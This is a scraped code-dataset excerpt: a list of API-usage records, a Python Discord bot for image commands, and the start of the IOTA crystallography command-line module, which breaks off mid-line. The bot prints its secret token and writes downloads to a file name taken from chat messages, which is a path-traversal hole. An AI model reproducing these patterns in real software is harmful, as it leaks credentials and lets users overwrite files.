{"api_name": "typing.Any", "line_number": 114, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 115, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 116, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 117, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 118, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 119, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 120, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 121, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 122, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 123, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 124, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 125, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 126, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 127, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 128, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 129, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 130, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 131, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 132, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 133, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 134, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 135, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 136, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 137, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 138, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 139, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 140, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 141, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 142, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 143, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 144, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 145, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 146, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 147, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 148, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 149, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 150, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 151, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 152, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 153, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 154, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 155, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 156, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 157, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 158, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 159, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 160, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 161, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 162, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 163, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 164, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 165, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 166, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 167, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 168, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 169, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 170, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 171, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 172, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 173, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 174, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 175, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 176, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 177, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 178, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 179, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 180, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 181, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 182, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 183, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 184, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 185, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 186, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 187, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 188, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 189, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 190, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 191, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 192, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 193, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 194, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 195, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 196, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 202, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 203, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 204, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 205, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 206, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 207, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 208, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 209, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 210, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 211, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 212, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 213, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 214, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 215, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 216, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 217, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 218, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 219, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 220, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 221, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 222, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 223, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 224, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 225, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 226, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 227, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 228, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 229, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 230, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 231, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 232, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 233, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 234, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 235, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 236, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 237, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 238, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 239, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 240, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 241, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 242, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 243, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 244, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 245, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 246, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 247, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 248, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 249, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 250, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 251, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 252, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 253, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 254, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 255, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 256, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 257, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 258, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 259, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 260, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 261, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 262, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 263, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 264, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 265, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 266, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 267, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 268, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 269, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 270, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 271, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 272, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 273, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 274, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 275, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 276, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 277, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 278, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 279, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 280, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 281, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 282, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 283, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 284, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 285, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 286, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 287, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 288, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 289, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 290, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 291, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 292, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 293, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 294, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 295, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 296, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 297, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 298, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 299, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 300, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 301, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 302, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 303, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 304, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 305, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 306, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 307, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 308, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 309, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 310, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 311, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 312, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 313, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 314, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 315, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 316, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 317, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 318, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 319, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 320, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 321, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 322, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 323, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 324, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 325, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 326, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 327, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 328, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 329, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 330, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 331, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 332, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 333, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 334, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 335, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 336, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 337, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 338, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 339, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 340, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 341, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 342, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 343, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 344, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 345, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 346, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 347, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 348, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 349, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 350, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 351, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 352, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 353, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 354, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 355, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 356, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 357, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 358, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 359, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 360, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 361, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 362, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 363, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 364, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 365, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 366, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 367, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 368, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 369, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 370, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 371, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 372, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 373, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 374, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 375, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 376, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 377, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 378, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 379, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 380, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 381, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 382, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 383, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 384, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 385, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 386, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 387, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 388, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 389, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 390, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 391, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 392, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 393, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 394, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 395, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 396, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 397, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 398, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 399, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 400, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 401, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 402, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 403, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 404, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 405, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 406, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 407, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 408, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 409, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 410, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 411, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 412, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 413, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 414, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 415, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 416, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 417, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 418, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 419, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 420, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 421, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 422, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 423, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 424, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 425, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 426, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 427, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 428, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 429, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 430, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 431, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 432, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 433, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 434, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 435, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 436, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 437, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 438, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 439, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 440, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 441, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 442, "usage_type": "name"}]} +{"seq_id": "11817236148", "text": "import os\n\nimport discord\nimport logging\nfrom dotenv import load_dotenv\nimport urllib\nimport requests\nimport img_analysis\n\nlogging.basicConfig(level=logging.INFO)\nload_dotenv()\nTOKEN = os.getenv('DISCORD_TOKEN')\nprint(TOKEN)\nclient = discord.Client()\n\nfilepath = \"~/Desktop/Bot_MK_I\"\n\n# Bot commands\ndef command(cmd):\n\tcmd_arr = cmd.split()\n\n\tif cmd_arr[0] == \"hello\":\n\t\treturn 'Hello!'\n\telif cmd_arr[0] == \"add\":\n\t\ttry:\n\t\t\treturn 'Answer is ' + str(float(cmd_arr[1]) + float(cmd_arr[2]))\n\t\texcept:\n\t\t\treturn 'Must add two numbers'\n\telif cmd_arr[0] == \"subtract\":\n\t\ttry:\n\t\t\treturn 'Answer is ' + str(float(cmd_arr[1]) - float(cmd_arr[2]))\n\t\texcept:\n\t\t\treturn 'Must add two numbers'\n\telif cmd_arr[0] == \"multiply\":\n\t\ttry:\n\t\t\treturn 'Answer is ' + str(float(cmd_arr[1]) * float(cmd_arr[2]))\n\t\texcept:\n\t\t\treturn 'Must add two numbers'\n\telif cmd_arr[0] == \"divide\":\n\t\ttry:\n\t\t\tif float(cmd_arr[2]) == 0.0:\n\t\t\t\treturn 'Cannot divide by zero'\n\t\t\treturn 'Answer is ' + str(float(cmd_arr[1]) / float(cmd_arr[2]))\n\t\texcept:\n\t\t\treturn 'Must add two numbers'\n\n\telse: \n\t\treturn 'Invalid or no command detected'\n\t\t\n# End bot commands\n\ndef smoke(image_name): \n return img_analysis.smoke(image_name)\n\ndef invert(image_name):\n return img_analysis.invert(image_name)\n\n@client.event\nasync def on_ready():\n print(f'{client.user} has connected to Discord!')\n\n@client.event\nasync def on_message(message):\n if message.author == client.user:\n return\n if message.content.startswith('$invert'):\n image_name = message.content.split()[1]\n image_url = message.attachments[0].url\n\n r = requests.get(image_url, stream=True)\n with open(image_name, 'wb') as f:\n for chunk in r.iter_content():\n f.write(chunk)\n\n ret_img_name = invert(image_name)\n await message.channel.send(file = discord.File(ret_img_name))\n if message.content.startswith('$analyze'):\n image_name = message.content.split()[1]\n # await message.channel.send(image_name)\n image_url = message.attachments[0].url\n\n r = requests.get(image_url, stream=True)\n with open(image_name, 'wb') as f:\n for chunk in r.iter_content():\n f.write(chunk)\n\n ret_img_name = analyze(image_name)\n # await message.channel.send(ret_img_name)\n # await message.channel.send(type(ret_img_name))\n # await message.channel.send(type(\"bind_analyzed.png\"))\n # f = discord.File(filepath = filepath, filename = \"bind_analyzed.png\")\n # e = discord.Embed()\n await message.channel.send(file = discord.File(ret_img_name))\n # await message.channel.send(file = discord.File(\"bind_analyzed.png\"))\n\n elif message.content.startswith('$show_map'):\n map_name = message.content.split()[1]\n await message.channel.send(file = discord.File(map_name + \".jpg\"))\n elif message.content.startswith('$'):\n output_msg = command(message.content[1:])\n await message.channel.send(output_msg)\n \n\nclient.run(TOKEN)", "repo_name": "joonlee20/ValorantSmokeBot", "sub_path": "bot_mk_i.py", "file_name": "bot_mk_i.py", "file_ext": "py", "file_size_in_byte": 3035, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "logging.basicConfig", "line_number": 10, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 10, "usage_type": "attribute"}, {"api_name": "dotenv.load_dotenv", "line_number": 11, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 12, "usage_type": "call"}, {"api_name": "discord.Client", "line_number": 14, "usage_type": "call"}, {"api_name": "img_analysis.smoke", "line_number": 53, "usage_type": "call"}, {"api_name": "img_analysis.invert", "line_number": 56, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 70, "usage_type": "call"}, {"api_name": "discord.File", "line_number": 76, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 82, "usage_type": "call"}, {"api_name": "discord.File", "line_number": 93, "usage_type": "call"}, {"api_name": "discord.File", "line_number": 98, "usage_type": "call"}]} +{"seq_id": "25014099016", "text": "from __future__ import absolute_import, division, print_function\n\n\"\"\"\nAuthor : Lyubimov, A.Y.\nCreated : 10/12/2014\nLast Changed: 10/31/2019\nDescription : IOTA command-line module.\n\"\"\"\nimport time\nimport datetime\nimport hdf5plugin\n\nimport argparse\nfrom contextlib import contextmanager\n\nfrom libtbx import easy_pickle as ep\nimport dials.util.command_line as cmd\n\nfrom iota import iota_version, help_message, logo\nfrom iota.utils.utils import main_log, iota_exit\n\n\ndef parse_command_args():\n \"\"\"Parses command line arguments (only options for now)\"\"\"\n parser = argparse.ArgumentParser(\n prog=\"iota.run\",\n formatter_class=argparse.RawDescriptionHelpFormatter,\n description=(help_message),\n epilog=(\"\\n{:-^70}\\n\".format(\"\")),\n )\n parser.add_argument(\n \"path\",\n type=str,\n nargs=\"*\",\n default=None,\n help=\"Path to data or file with IOTA parameters\",\n )\n parser.add_argument(\n \"--version\",\n action=\"version\",\n version=\"IOTA {}\".format(iota_version),\n help=\"Prints version info of IOTA\",\n )\n parser.add_argument(\n \"-d\",\n \"--default\",\n action=\"store_true\",\n help=\"Generate default settings files and stop\",\n )\n parser.add_argument(\n \"--ha14\", action=\"store_true\", help=\"Run IOTA with old HA14 backend\"\n )\n parser.add_argument(\n \"--random\",\n type=int,\n nargs=1,\n default=0,\n help='Size of randomized subset, e.g. \"--random 10\"',\n )\n parser.add_argument(\n \"--range\",\n type=str,\n nargs=\"?\",\n default=None,\n help='Range of images, e.g.\"--range 1-5,25,200-250\"',\n )\n parser.add_argument(\n \"-o\",\n \"--out_type\",\n type=str,\n nargs=1,\n default=\"progress\",\n help=\"Type of stdout; default is progress bar in stdout\",\n )\n parser.add_argument(\n \"-n\",\n \"--nproc\",\n type=int,\n nargs=1,\n default=0,\n help='Specify a number of cores for a multiprocessor run\"',\n )\n parser.add_argument(\n \"--analyze\",\n type=str,\n nargs=\"?\",\n const=None,\n default=None,\n help=\"Use for analysis only; specify run number or folder\",\n )\n parser.add_argument(\n \"--run_path\",\n type=str,\n nargs=1,\n default=None,\n help=\"Path to a pre-initialized run\",\n )\n parser.add_argument(\n \"--tmp\", type=str, nargs=1, default=None, help=\"Path to temp folder\"\n )\n\n return parser\n\n\n@contextmanager # Will print start / stop messages around some processes\ndef prog_message(msg, prog=\"\", msg2=\"\", out_type=\"progress\"):\n if out_type == \"progress\":\n cmd.Command.start(msg)\n elif \"debug\" in out_type:\n print(\"DEBUG {}: {}\".format(prog, msg))\n elif out_type == \"gui_verbose\":\n print(\"IOTA {}: {}\".format(prog, msg))\n yield\n if out_type == \"progress\":\n if msg2:\n cmd.Command.end(\"{} -- DONE\".format(msg2))\n else:\n cmd.Command.end(\"{} -- DONE\".format(msg))\n else:\n if msg2:\n if out_type == \"debug\":\n print(\"DEBUG {}: {}\".format(prog, msg2))\n if out_type == \"gui_verbose\":\n print(\"IOTA {}: {}\".format(prog, msg2))\n\n\nfrom iota.base.processor import ProcessingBase\n\n\nclass Process(ProcessingBase):\n \"\"\"Processing script w/o using the init object.\"\"\"\n\n def __init__(self, out_type=\"silent\", **kwargs):\n ProcessingBase.__init__(self, **kwargs)\n\n self.prog_count = 0\n self.out_type = out_type\n\n # TODO: may not have a callback option with new MP\n def callback(self, result):\n \"\"\"Will add object file to tmp list for inclusion in info.\"\"\"\n if self.out_type == \"progress\":\n if self.prog_count < self.info.n_input_images:\n prog_step = 100 / self.info.n_input_images\n self.gs_prog.update(self.prog_count * prog_step)\n self.prog_count += 1\n else:\n self.gs_prog.finished()\n\n if result:\n # Write image object to file from main processing thread\n ep.dump(result.obj_file, result)\n\n # Write image object path to list\n with open(self.info.obj_list_file, \"a\") as olf:\n olf.write(\"{}\\n\".format(result.obj_file))\n\n def process(self):\n \"\"\"Run importer and/or processor.\"\"\"\n\n start_time = time.time()\n\n # Process images\n with prog_message(\n \"Processing {} images\".format(len(self.info.unprocessed)),\n prog=\"PROCESSING\",\n out_type=self.out_type,\n ):\n if self.out_type == \"progress\":\n self.prog_count = 0\n self.gs_prog = cmd.ProgressBar(title=\"PROCESSING\")\n img_objects = self.run_process(iterable=self.info.unprocessed)\n\n proc_time = datetime.timedelta(seconds=int(time.time() - start_time))\n hours, minutes, seconds = str(proc_time).split(\":\")\n main_log(\n self.info.logfile,\n \"Total processing time: {} hours, {} minutes, {} seconds\"\n \"\".format(hours, minutes, seconds),\n print_tag=False,\n )\n\n # Run analysis if not in GUI mode\n if not \"gui\" in self.out_type:\n with prog_message(\n \"Analyzing results\", prog=\"ANALYSIS\", out_type=self.out_type\n ):\n self.info.finished_objects = [o.obj_file for o in img_objects]\n self.run_analysis()\n\n if \"silent\" not in self.out_type:\n if self.info.have_results:\n print(\"\\n\".join(self.info.final_table))\n print(\"\\n\".join(self.info.uc_table))\n print(\"\\n\".join(self.info.summary))\n else:\n print(\"\\n **** NO IMAGES INTEGRATED! ****\")\n\n # Determine total runtime\n if not \"gui\" in self.out_type:\n runtime = datetime.timedelta(seconds=int(time.time() - start_time))\n hours, minutes, seconds = str(runtime).split(\":\")\n main_log(\n self.info.logfile,\n \"Total run time: {} hours, {} minutes, {} seconds\"\n \"\".format(hours, minutes, 